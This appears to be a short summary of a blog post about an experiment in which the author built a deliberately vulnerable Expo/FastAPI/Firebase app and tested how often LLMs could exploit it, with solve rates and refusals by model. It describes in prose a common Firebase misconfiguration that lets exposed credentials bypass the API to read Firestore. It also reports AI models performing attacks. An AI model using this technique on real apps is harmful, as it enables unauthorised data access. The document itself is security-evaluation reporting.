I built a vulnerable app and spent $1,500 seeing if LLMs could hack it
3 hours ago
- #Firebase Exploit
- #AI Evaluation
- #LLM Security Testing
- The author built a vulnerable React Native Expo app with a Python FastAPI backend and Firebase to test if LLMs could exploit common security flaws.
- The exploit involved using Firebase credentials from the app to directly sign up and read Firestore, bypassing a secure API—a common real-world issue.
- GPT-5.5 had the highest solve rate (7/10), focusing quickly on Firebase, while other models like Deepseek V4 Pro (3/10) and Claude variants (2/10) had lower success.
- Several models (e.g., Gemini 3.1 Pro Preview, Deepseek V4 Flash) failed due to refusals or misdirected efforts, with some fixating on API exploits instead of Firebase.
- The experiment cost $1,500, revealing challenges like model guardrails, high costs for some providers, and technical hurdles in running the evaluation harness.